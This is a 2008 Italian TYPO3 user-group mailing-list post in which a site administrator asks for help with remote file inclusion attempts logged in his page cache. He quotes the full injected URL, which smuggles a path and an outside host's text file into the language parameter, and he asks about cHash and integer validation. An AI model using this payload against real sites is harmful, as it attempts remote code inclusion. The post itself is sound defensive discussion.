[TYPO3-UG Italy] info RFI Typo3 ver. 4.0.1

Igor Longagnani i.longagnani at softlabs.it
Mon Feb 25 14:00:05 CET 2008

Salve da qualche settimana, pur non producendo danni veri e propri subisco
un attacco che fa sì che alcune pagine nelle tabelle CACHE_PAGES ed
INDEX_PHASH contengano URLs del tipo

http://www.<miodominio>.it/index.php?id=10&L=0%2F%2Fengine%2FMakeXML.php%3FfileOreonConf%3Dhttp%3A%2F%2Fwww.ourcolemanfamily.com%2Fgenealogy%2Fheadstones%2Fid.txt

a fronte di un url corretto

http://www.<miodominio>.it/index.php?id=10

avendo un'aggiunta "non corretta" del tipo

&L=0%2F%2Fengine%2FMakeXML.php%3FfileOreonConf%3Dhttp%3A%2F%2Fwww.ourcolemanfamily.com%2Fgenealogy%2Fheadstones%2Fid.txt

Ho visto che nel passato (ver. precedenti di Typo3) si poteva
forzare/controllare il valore della variabile L (language) affinchè fosse
un intero ... ( è tutto ancora valido)
Inoltre ho visto che nelle pagine che presentano "l'anomalia" non è stato
calcolato il cHash come da precisa illustrazione di Kasper

http://typo3.org/development/articles/the-mysteries-of-chash/

e ripreso in questa e-mail:
http://lists.netfielders.de/pipermail/typo3-project-tt-news/2006-January/000048.html

Conclusione e domanda :)
No ho trovato errori nel sito ne inclusioni strane nelle pagine ...solo
"lo sporco nel link", per ora sembra che nessuno sia entrato nel server...

Any idea, avete idee?

allego quello che ho trovato in rete tra i molti link poco signigifcativi
o per me incomprensibili

http://en.wikipedia.org/wiki/Remote_File_Inclusion
http://www.criticalsecurity.net/lofiversion/index.php/t22495.html

Grazie.